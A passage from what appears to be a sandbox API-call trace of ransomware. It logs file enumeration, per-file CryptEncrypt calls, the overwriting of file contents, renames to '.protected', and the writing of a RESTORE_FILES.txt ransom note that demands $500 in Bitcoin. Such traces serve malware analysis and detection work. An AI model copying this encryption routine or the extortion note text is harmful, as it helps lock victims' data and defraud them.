lpOverlapped=0x0) returned 1 [0076.795] CloseHandle (hObject=0xa4) returned 1 [0076.795] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0076.795] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="Windows") returned -1 [0076.795] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="Program Files") returned -1 [0076.795] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="Program Files (x86)") returned -1 [0076.796] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="$Recycle.bin") returned 1 [0076.796] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="System Volume Information") returned -1 [0076.796] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 71 [0076.796] lstrcmpW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2=".") returned 1 [0076.796] lstrcmpW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="..") returned 1 [0076.796] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*") returned 73 [0076.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0076.797] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.797] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.797] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.797] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.797] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.797] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\.") returned 73 [0076.797] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.797] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.798] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.798] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.798] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.798] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.798] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.798] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\..") returned 74 [0076.798] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.798] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.798] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.798] lstrcmpiW (lpString1="state.rsm", lpString2="Windows") returned -1 [0076.799] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files") returned 1 [0076.799] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files (x86)") returned 1 [0076.799] lstrcmpiW (lpString1="state.rsm", lpString2="$Recycle.bin") returned 1 [0076.799] lstrcmpiW (lpString1="state.rsm", lpString2="System Volume Information") returned -1 [0076.799] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 81 [0076.799] StrStrIW (lpFirst="state.rsm", lpSrch=".protected") returned 0x0 [0076.799] lstrcmpW (lpString1="state.rsm", lpString2="RESTORE_FILES.txt") returned 1 [0076.799] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c 
| out: pbBuffer=0x295f12c) returned 1 [0076.799] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0076.799] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.799] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 81 [0076.799] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0076.799] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 81 [0076.799] StrStrW (lpFirst="state.rsm", lpSrch=".rar") returned 0x0 [0076.799] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 81 [0076.799] StrStrW (lpFirst="state.rsm", lpSrch=".zip") returned 0x0 [0076.799] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x29a, lpOverlapped=0x0) returned 1 [0076.800] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffd66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.801] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x29a, lpOverlapped=0x0) returned 1 [0076.801] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 
returned 1 [0076.801] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0076.801] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0076.801] CloseHandle (hObject=0xb4) returned 1 [0076.801] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.protected") returned 91 [0076.801] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.protected" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.protected")) returned 1 [0076.803] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.803] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="Windows") returned -1 [0076.803] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="Program Files") returned 1 [0076.803] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="Program Files (x86)") returned 1 [0076.803] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="$Recycle.bin") returned 1 [0076.803] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="System Volume Information") returned 1 [0076.803] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 88 [0076.803] StrStrIW 
(lpFirst="vcredist_x86.exe", lpSrch=".protected") returned 0x0 [0076.803] lstrcmpW (lpString1="vcredist_x86.exe", lpString2="RESTORE_FILES.txt") returned 1 [0076.803] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0076.803] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0076.803] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.804] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 88 [0076.804] StrStrW (lpFirst="vcredist_x86.exe", lpSrch=".txt") returned 0x0 [0076.804] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 88 [0076.804] StrStrW (lpFirst="vcredist_x86.exe", lpSrch=".rar") returned 0x0 [0076.804] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 88 [0076.804] StrStrW (lpFirst="vcredist_x86.exe", lpSrch=".zip") returned 0x0 [0076.804] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0076.820] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.821] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, 
nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0076.821] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.821] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0076.824] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0076.824] CloseHandle (hObject=0xb4) returned 1 [0076.824] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.protected") returned 98 [0076.824] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.protected" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.protected")) returned 1 [0076.825] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0076.825] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0076.825] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\RESTORE_FILES.txt") returned 89 [0076.825] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0076.851] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0076.851] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0076.851] lstrlenA (lpString="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") returned 684 [0076.851] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0076.852] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.852] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0076.852] CloseHandle (hObject=0xa4) returned 1 [0076.852] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0076.852] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="Windows") returned -1 [0076.852] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="Program Files") returned -1 [0076.852] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="Program Files (x86)") returned -1 [0076.852] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="$Recycle.bin") returned 1 [0076.852] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="System Volume Information") returned -1 [0076.852] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned 71 [0076.852] lstrcmpW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2=".") returned 1 [0076.852] lstrcmpW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="..") returned 1 
[0076.852] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*") returned 73 [0076.852] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0076.853] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.853] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.853] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.853] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.853] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.853] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\.") returned 73 [0076.853] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.853] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.853] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.853] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.853] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.853] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.853] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.853] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\..") returned 74 [0076.853] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.853] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.853] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.853] lstrcmpiW 
(lpString1="state.rsm", lpString2="Windows") returned -1 [0076.853] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files") returned 1 [0076.853] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files (x86)") returned 1 [0076.853] lstrcmpiW (lpString1="state.rsm", lpString2="$Recycle.bin") returned 1 [0076.853] lstrcmpiW (lpString1="state.rsm", lpString2="System Volume Information") returned -1 [0076.853] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") returned 81 [0076.853] StrStrIW (lpFirst="state.rsm", lpSrch=".protected") returned 0x0 [0076.853] lstrcmpW (lpString1="state.rsm", lpString2="RESTORE_FILES.txt") returned 1 [0076.853] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0076.853] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0076.853] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.854] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") returned 81 [0076.854] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0076.854] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") returned 81 [0076.854] StrStrW (lpFirst="state.rsm", lpSrch=".rar") returned 0x0 [0076.854] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") 
returned 81 [0076.854] StrStrW (lpFirst="state.rsm", lpSrch=".zip") returned 0x0 [0076.854] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2fe, lpOverlapped=0x0) returned 1 [0076.866] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffd02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.866] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2fe, lpOverlapped=0x0) returned 1 [0076.866] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.866] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0076.866] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0076.866] CloseHandle (hObject=0xb4) returned 1 [0076.867] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.protected") returned 91 [0076.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.protected" (normalized: "c:\\programdata\\package 
cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.protected")) returned 1 [0076.867] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.867] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="Windows") returned -1 [0076.867] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="Program Files") returned 1 [0076.867] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="Program Files (x86)") returned 1 [0076.867] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="$Recycle.bin") returned 1 [0076.867] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="System Volume Information") returned 1 [0076.867] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned 89 [0076.867] StrStrIW (lpFirst="VC_redist.x86.exe", lpSrch=".protected") returned 0x0 [0076.867] lstrcmpW (lpString1="VC_redist.x86.exe", lpString2="RESTORE_FILES.txt") returned 1 [0076.867] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0076.868] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0076.868] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.868] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned 89 [0076.868] StrStrW (lpFirst="VC_redist.x86.exe", lpSrch=".txt") returned 0x0 [0076.868] 
lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned 89 [0076.868] StrStrW (lpFirst="VC_redist.x86.exe", lpSrch=".rar") returned 0x0 [0076.868] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned 89 [0076.868] StrStrW (lpFirst="VC_redist.x86.exe", lpSrch=".zip") returned 0x0 [0076.868] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0076.901] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.901] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0076.901] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.901] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0076.967] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0076.967] CloseHandle (hObject=0xb4) returned 1 [0076.968] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 